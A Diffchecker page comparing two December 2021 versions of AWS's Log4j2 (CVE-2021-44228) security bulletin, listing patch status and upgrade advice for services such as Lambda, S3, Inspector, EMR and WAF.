Compare text

Find the difference between two text files

Real-time diff

Unified diff

Collapse lines

Highlight change

Syntax highlighting

Tools

Diffchecker Desktop The most secure way to run Diffchecker. Get the Diffchecker Desktop app: your diffs never leave your computer!Get Desktop

v3->v4

Created 3 years agoDiff never expires

82 lines

44 lines

[V3] Last Updated Date: 2021/12/14 2:45 PM PST

[V4] Last Updated Date: 2021/12/15 3:30 PM PST

AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228).

Responding to security issues such as this one show the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers data and workloads. We're taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.

Responding to security issues such as this one shows the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers’ data and workloads. We're taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.

We continue to recommend that our customers take action to update all their applications and services by patching for known issues like this one and continue to follow our well architected guidance.

One of the technologies we’ve developed and deployed is a hot patch for applications that may include Log4j. We’ve also made this available as an open-source solution, which is available here.

Even with this hot patch deployed, customers should still plan on deploying an updated Log4j library as quickly as they safely can.

Additional service-specific information is provided below. If you need additional details or assistance, please contact AWS Support.

Amazon API Gateway

Amazon Kinesis

As of December 13, 2021, all Amazon API Gateway hosts have been patched to mitigate the Log4j issue referenced in CVE-2021-44228.

A new version of the Kinesis Agent, which addresses the recently disclosed Apache Log4j2 library issue (CVE-2021-44228), is available here.

Amazon CloudFront

Amazon Inspector

Amazon CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.

The Amazon Inspector service is patched against the Log4j issue.

Amazon Connect

The Inspector service helps detect CVE-2021-44228 (Log4Shell) issues within customer EC2 workloads and ECR images. Detections are currently available for impacted operating system level packages on Linux. These include, but are not limited to, apache-log4j2 and liblog4j2-java for Debian; log4j, log4jmanual and log4j12 for SUSE; and Elasticsearch for Alpine, Centos, Debian, Red Hat, SUSE and Ubuntu. Additional detections will be added as further impacts are identified by respective distribution security teams. Inspector decomposes Java archives stored within ECR images and generates findings for impacted packages or applications. These findings will be identified in the Inspector console under “CVE-2021-44228” or “IN1-JAVA-ORGAPACHELOGGINGLOG4J-2314720 - org.apache.logging.log4j:log4j-core”.

Amazon Connect services have been updated to mitigate the issues identified in CVE-2021-44228.

Amazon Inspector Classic

Amazon DynamoDB

The Amazon Inspector service is patched against the Log4j issue.

Amazon DynamoDB and Amazon DynamoDB Accelerator (DAX) have been updated to mitigate the issues identified in CVE-2021-44228.

The Inspector Classic service helps detect CVE-2021-44228 (Log4Shell) issues within customer EC2 workloads. Detections for CVE-2021-44228 (Log4Shell) are currently available for impacted operating system level packages on Linux. These include, but are not limited to, apache-log4j2 and liblog4j2-java for Debian; log4j, log4jmanual and log4j12 for SUSE; and Elasticsearch for Alpine, Centos, Debian, Red Hat, SUSE and Ubuntu.

Amazon EC2

Amazon WorkSpaces/AppStream 2.0

The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.

Amazon WorkSpaces and AppStream 2.0 are not affected by CVE-2021-44228 with default configurations. The default Amazon Linux 2 images of WorkSpaces and AppStream do not contain Log4j, and the versions of Log4j available in the Amazon Linux 2 default package repositories are not affected by CVE-2021-44228. However, if you have deployed the WorkDocs Sync client to Windows WorkSpaces, please take the actions recommended below.

Amazon ElastiCache

Windows WorkSpaces by default do not have WorkDocs Sync installed. However, WorkSpaces used to have a default desktop shortcut to the WorkDocs Sync client installer before June 2021. The WorkDocs Sync client version 1.2.895.1 (and older) contains the Log4j component. If you have deployed the old WorkDocs Sync client versions to WorkSpaces, please restart the Sync client on WorkSpaces via management tools like SCCM, or instruct your WorkSpaces users to manually open the Sync client - “Amazon WorkDocs” from the list of installed programs. At launch, the Sync client would auto-update to the latest version 1.2.905.1 that is not affected by CVE-2021-44228. Workdocs Drive and Workdocs Companion applications are not affected by the issue.

Amazon ElastiCache’s Redis engine does not include Log4j2 in its managed runtimes or base container images. Amazon ElastiCache completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.

Amazon Timestream

Amazon EMR

Amazon Timestream has been updated to mitigate the issues identified in CVE-2021-44228.

CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Apache Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.

Amazon DocumentDB

We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.

As of December 13, 2021, Amazon DocumentDB has been patched to mitigate the Log4j issue referenced in CVE-2021-44228.

AWS IoT SiteWise Edge

Amazon CloudWatch

Updates for all AWS IoT SiteWise Edge components that use Log4j were made available for deployment on 12/13/2021. These components are: OPC-UA collector (v2.0.3), Data processing pack (v2.0.14), and Publisher (v2.0.2). AWS recommends that customers who are using these components deploy the latest versions to their SiteWise Edge gateways.

Amazon CloudWatch services have been updated to mitigate the issues identified in CVE-2021-44228.

Amazon Keyspaces (for Apache Cassandra)

AWS Secrets Manager

Amazon Keyspaces (for Apache Cassandra) has been updated to mitigate the issues identified in CVE-2021-44228.

AWS Secrets Manager has been updated to mitigate the issues identified in CVE-2021-44228.

Amazon Kinesis Data Analytics

Amazon Single Sign-On

The versions of Apache Flink supported by Amazon Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.

Amazon Single Sign-On services have been updated to mitigate the issues identified in CVE-2021-44228.

We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. More information about the UpdateApplication API is available within the service’s documentation.

Amazon RDS Oracle

Amazon Kinesis Data Streams

Amazon RDS Oracle has updated the version of Log4j2 in use within the service. Access to RDS instances continues to be restricted by your VPCs and other security controls such as security groups and network access control lists (ACL). We strongly encourage you to review these settings to ensure proper access management to your RDS instances.

We are actively patching all sub-systems that use Log4j2 by applying updates. The Kinesis Client Library (KCL) version 2.X and the Kinesis Producer Library (KPL) are not impacted. For customers using KCL 1.x, we have released an updated version and we strongly recommend that all KCL version 1.x customers upgrade to KCL version 1.14.5 (or higher) which is available here.

Per Oracle Support document 2827611.1, the Oracle database itself is not affected by this issue.

Amazon Managed Streaming for Apache Kafka (MSK)

Amazon Cloud Directory

We are aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use Log4j > 2.0.0 library and are being patched where needed.

Amazon Cloud Directory has been updated to mitigate the issues identified in CVE-2021-44228.

Amazon Managed Workflows for Apache Airflow (MWAA)

Amazon Simple Queue Service (SQS)

MWAA has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MWAA service code (AWS specific) and open source code (Apache Airflow).

Amazon Simple Queue Service (SQS) completed patching for the Apache Log4j2 issue (CVE-2021-44228) for SQS’s data ingress and egress on December 13, 2021. We have also completed patching all other SQS systems that used Log4j2.

As of Dec 14, 2021, we have completed all required updates to the MWAA service code to address the issue. Apache Airflow does not use Log4j2 and is not affected by this issue.

AWS KMS

We strongly encourage customers who have added Log4j2 to their environments to update to the latest version.

AWS KMS has been updated to mitigate the issues identified in CVE-2021-44228.

Amazon MemoryDB for Redis

Amazon Redshift

Amazon MemoryDB for Redis completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.

Amazon Redshift clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.

Amazon MQ

AWS Directory Service

Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).

AWS Directory Service has been updated to mitigate the issues identified in CVE-2021-44228.

As of Dec 13, 2021, we have completed all required updates to the Amazon MQ service code to address the issue.

There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.2.x, which is not affected by this issue. RabbitMQ does not use Log4j and is not affected by this issue.

Amazon Neptune

All active Amazon Neptune clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.

Amazon OpenSearch Service

Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.

Amazon RDS

Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j2 library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.

Amazon S3

Amazon S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.

Amazon Simple Notification Service (SNS)

Amazon SNS systems that serve customer traffic are patched against the Log4j2 issue. We are working to apply the Log4j2 patch to sub-systems that operate separately from SNS’s systems that serve customer traffic.

Amazon Simple Workflow Service (SWF)

Amazon Simple Workflow Service (SWF) has been updated to mitigate the issues identified in CVE-2021-44228.

AWS CloudHSM

AWS CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading the CloudHSM JCE SDK to version 3.4.1 or higher.

AWS Elastic Beanstalk

AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.

If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.

In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.

More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.

AWS Glue

AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.

AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If you have uploaded a custom jar file for use in your ETL jobs or Development Endpoints which includes a specific version of Apache Log4j, then you are advised to update your jar to use the latest version of Apache Log4j.

AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact AWS Support.

AWS Greengrass

Updates for all AWS Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.

The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.

AWS Lake Formation

AWS Lake Formation service hosts are being updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.

AWS Lambda

AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.

AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issues described in CVE-2021-44228 and CVE-2021-45046.

AWS SDK

For cases where a customer function includes an impacted Log4j2 version, we have applied a change to the Lambda Java managed runtimes and base container images (Java 8, Java 8 on AL2, and Java 11) that helps to mitigate the issues in CVE-2021-44228 and CVE-2021-45046. Customers using managed runtimes will have the change applied automatically. Customers using container images will need to rebuild from the latest base container image, and redeploy.

The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.

Independent of this change, we strongly encourage all customers whose functions include Log4j2 to update to the latest version. Specifically, customers using the aws-lambda-java-log4j2 library in their functions should update to version 1.4.0 and redeploy their functions. This version updates the underlying Log4j2 utility dependencies to version 2.16.0. The updated aws-lambda-java-log4j2 binary is available at the Maven repository and its source code is available in Github.

AWS Step Functions

AWS Step Functions has been updated to mitigate the issues identified in CVE-2021-44228.

AWS Web Application Firewall (WAF)

To improve detection and mitigation relating to the recent Log4j security issue, customers of CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync can optionally enable AWS WAF and apply two AWS Managed Rules (AMR): AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList.

AWSManagedRulesKnownBadInputsRuleSet inspects request uri, body, and commonly used headers, while AWSManagedRulesAnonymousIpList helps block requests from services that allow the obfuscation of viewer identity. You can apply these rules by creating an AWS WAF web ACL, adding one or both rulesets to your web ACL, and then associating the web ACL with your CloudFront distribution, ALB, API Gateway or AppSync GraphQL APIs.

We continue to iterate the AWSManagedRulesKnownBadInputsRuleSet Rule Group as we learn more. To receive automatic updates to the AWSManagedRulesKnownBadInputsRuleSet, please choose the default version. For customers using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions. Customers can use AWS Firewall Manager which enables you to configure AWS WAF rules across multiple AWS accounts and resources from a single place. You can group rules, build policies, and centrally apply those policies across your entire infrastructure.

NICE

Due to a CVE in the Apache Log4j library, included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.

Please feel free to contact us.

Saved diffs

Original text

Open file

[V3] Last Updated Date: 2021/12/14 2:45 PM PST
AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228).
Responding to security issues such as this one show the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers data and workloads. We're taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.
We continue to recommend that our customers take action to update all their applications and services by patching for known issues like this one and continue to follow our well architected guidance.
Additional service-specific information is provided below. If you need additional details or assistance, please contact AWS Support.
Amazon API Gateway
As of December 13, 2021, all Amazon API Gateway hosts have been patched to mitigate the Log4j issue referenced in CVE-2021-44228.
Amazon CloudFront
Amazon CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
Amazon Connect
Amazon Connect services have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon DynamoDB
Amazon DynamoDB and Amazon DynamoDB Accelerator (DAX) have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon EC2
The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
Amazon ElastiCache
Amazon ElastiCache’s Redis engine does not include Log4j2 in its managed runtimes or base container images. Amazon ElastiCache completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
Amazon EMR
CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Apache Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
AWS IoT SiteWise Edge
Updates for all AWS IoT SiteWise Edge components that use Log4j were made available for deployment on 12/13/2021. These components are: OPC-UA collector (v2.0.3), Data processing pack (v2.0.14), and Publisher (v2.0.2). AWS recommends that customers who are using these components deploy the latest versions to their SiteWise Edge gateways.
Amazon Keyspaces (for Apache Cassandra)
Amazon Keyspaces (for Apache Cassandra) has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Kinesis Data Analytics
The versions of Apache Flink supported by Amazon Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.
We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. More information about the UpdateApplication API is available within the service’s documentation.
Amazon Kinesis Data Streams
We are actively patching all sub-systems that use Log4j2 by applying updates. The Kinesis Client Library (KCL) version 2.X and the Kinesis Producer Library (KPL) are not impacted. For customers using KCL 1.x, we have released an updated version and we strongly recommend that all KCL version 1.x customers upgrade to KCL version 1.14.5 (or higher) which is available here.
Amazon Managed Streaming for Apache Kafka (MSK)
We are aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use Log4j > 2.0.0 library and are being patched where needed.
Amazon Managed Workflows for Apache Airflow (MWAA)
MWAA has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MWAA service code (AWS specific) and open source code (Apache Airflow).
As of Dec 14, 2021, we have completed all required updates to the MWAA service code to address the issue. Apache Airflow does not use Log4j2 and is not affected by this issue.
We strongly encourage customers who have added Log4j2 to their environments to update to the latest version.
Amazon MemoryDB for Redis
Amazon MemoryDB for Redis completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
Amazon MQ
Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).
As of Dec 13, 2021, we have completed all required updates to the Amazon MQ service code to address the issue.
There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.2.x, which is not affected by this issue. RabbitMQ does not use Log4j and is not affected by this issue.
Amazon Neptune
All active Amazon Neptune clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.
Amazon OpenSearch Service
Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.
Amazon RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j2 library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.
Amazon S3
Amazon S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.
Amazon Simple Notification Service (SNS)
Amazon SNS systems that serve customer traffic are patched against the Log4j2 issue. We are working to apply the Log4j2 patch to sub-systems that operate separately from SNS’s systems that serve customer traffic.
Amazon Simple Workflow Service (SWF)
Amazon Simple Workflow Service (SWF) has been updated to mitigate the issues identified in CVE-2021-44228.
AWS CloudHSM
AWS CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading the CloudHSM JCE SDK to version 3.4.1 or higher.
AWS Elastic Beanstalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If you have uploaded a custom jar file for use in your ETL jobs or Development Endpoints which includes a specific version of Apache Log4j, then you are advised to update your jar to use the latest version of Apache Log4j.
AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact AWS Support.
AWS Greengrass
Updates for all AWS Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.
The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.
AWS Lake Formation
AWS Lake Formation service hosts are being updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.
AWS Lambda
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AWS Step Functions
AWS Step Functions has been updated to mitigate the issues identified in CVE-2021-44228.
AWS Web Application Firewall (WAF)
To improve detection and mitigation relating to the recent Log4j security issue, customers of CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync can optionally enable AWS WAF and apply two AWS Managed Rules (AMR): AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList.
AWSManagedRulesKnownBadInputsRuleSet inspects request uri, body, and commonly used headers, while AWSManagedRulesAnonymousIpList helps block requests from services that allow the obfuscation of viewer identity. You can apply these rules by creating an AWS WAF web ACL, adding one or both rulesets to your web ACL, and then associating the web ACL with your CloudFront distribution, ALB, API Gateway or AppSync GraphQL APIs.
We continue to iterate the AWSManagedRulesKnownBadInputsRuleSet Rule Group as we learn more. To receive automatic updates to the AWSManagedRulesKnownBadInputsRuleSet, please choose the default version. For customers using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions. Customers can use AWS Firewall Manager which enables you to configure AWS WAF rules across multiple AWS accounts and resources from a single place. You can group rules, build policies, and centrally apply those policies across your entire infrastructure.
NICE
Due to a CVE in the Apache Log4j library, included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.
Please feel free to contact us.

Changed text

Open file

[V4] Last Updated Date: 2021/12/15 3:30 PM PST
AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228).
Responding to security issues such as this one shows the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers’ data and workloads. We're taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.
One of the technologies we’ve developed and deployed is a hot patch for applications that may include Log4j. We’ve also made this available as an open-source solution, which is available here.
Even with this hot patch deployed, customers should still plan on deploying an updated Log4j library as quickly as they safely can.
Additional service-specific information is provided below. If you need additional details or assistance, please contact AWS Support.
Amazon Kinesis
A new version of the Kinesis Agent, which addresses the recently disclosed Apache Log4j2 library issue (CVE-2021-44228), is available here.
Amazon Inspector
The Amazon Inspector service is patched against the Log4j issue.
The Inspector service helps detect CVE-2021-44228 (Log4Shell) issues within customer EC2 workloads and ECR images. Detections are currently available for impacted operating system level packages on Linux. These include, but are not limited to, apache-log4j2 and liblog4j2-java for Debian; log4j, log4jmanual and log4j12 for SUSE; and Elasticsearch for Alpine, Centos, Debian, Red Hat, SUSE and Ubuntu. Additional detections will be added as further impacts are identified by respective distribution security teams. Inspector decomposes Java archives stored within ECR images and generates findings for impacted packages or applications. These findings will be identified in the Inspector console under “CVE-2021-44228” or “IN1-JAVA-ORGAPACHELOGGINGLOG4J-2314720 - org.apache.logging.log4j:log4j-core”.
Amazon Inspector Classic
The Amazon Inspector service is patched against the Log4j issue.
The Inspector Classic service helps detect CVE-2021-44228 (Log4Shell) issues within customer EC2 workloads. Detections for CVE-2021-44228 (Log4Shell) are currently available for impacted operating system level packages on Linux. These include, but are not limited to, apache-log4j2 and liblog4j2-java for Debian; log4j, log4jmanual and log4j12 for SUSE; and Elasticsearch for Alpine, Centos, Debian, Red Hat, SUSE and Ubuntu.
Amazon WorkSpaces/AppStream 2.0
Amazon WorkSpaces and AppStream 2.0 are not affected by CVE-2021-44228 with default configurations. The default Amazon Linux 2 images of WorkSpaces and AppStream do not contain Log4j, and the versions of Log4j available in the Amazon Linux 2 default package repositories are not affected by CVE-2021-44228. However, if you have deployed the WorkDocs Sync client to Windows WorkSpaces, please take the actions recommended below.
Windows WorkSpaces by default do not have WorkDocs Sync installed. However, WorkSpaces used to have a default desktop shortcut to the WorkDocs Sync client installer before June 2021. The WorkDocs Sync client version 1.2.895.1 (and older) contains the Log4j component. If you have deployed the old WorkDocs Sync client versions to WorkSpaces, please restart the Sync client on WorkSpaces via management tools like SCCM, or instruct your WorkSpaces users to manually open the Sync client - “Amazon WorkDocs” from the list of installed programs. At launch, the Sync client would auto-update to the latest version 1.2.905.1 that is not affected by CVE-2021-44228. Workdocs Drive and Workdocs Companion applications are not affected by the issue.
Amazon Timestream
Amazon Timestream has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon DocumentDB
As of December 13, 2021, Amazon DocumentDB has been patched to mitigate the Log4j issue referenced in CVE-2021-44228.
Amazon CloudWatch
Amazon CloudWatch services have been updated to mitigate the issues identified in CVE-2021-44228.
AWS Secrets Manager
AWS Secrets Manager has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Single Sign-On
Amazon Single Sign-On services have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon RDS Oracle
Amazon RDS Oracle has updated the version of Log4j2 in use within the service. Access to RDS instances continues to be restricted by your VPCs and other security controls such as security groups and network access control lists (ACL). We strongly encourage you to review these settings to ensure proper access management to your RDS instances.
Per Oracle Support document 2827611.1, the Oracle database itself is not affected by this issue.
Amazon Cloud Directory
Amazon Cloud Directory has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Simple Queue Service (SQS)
Amazon Simple Queue Service (SQS) completed patching for the Apache Log4j2 issue (CVE-2021-44228) for SQS’s data ingress and egress on December 13, 2021. We have also completed patching all other SQS systems that used Log4j2.
AWS KMS
AWS KMS has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Redshift
Amazon Redshift clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.
AWS Directory Service
AWS Directory Service has been updated to mitigate the issues identified in CVE-2021-44228.
AWS Lambda
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issues described in CVE-2021-44228 and CVE-2021-45046.
For cases where a customer function includes an impacted Log4j2 version, we have applied a change to the Lambda Java managed runtimes and base container images (Java 8, Java 8 on AL2, and Java 11) that helps to mitigate the issues in CVE-2021-44228 and CVE-2021-45046. Customers using managed runtimes will have the change applied automatically. Customers using container images will need to rebuild from the latest base container image, and redeploy.
Independent of this change, we strongly encourage all customers whose functions include Log4j2 to update to the latest version. Specifically, customers using the aws-lambda-java-log4j2 library in their functions should update to version 1.4.0 and redeploy their functions. This version updates the underlying Log4j2 utility dependencies to version 2.16.0. The updated aws-lambda-java-log4j2 binary is available at the Maven repository and its source code is available in Github.

Words removed	1754
Total words	1940
Words removed (%)	90.41

Words added	787
Total words	973
Words added (%)	80.88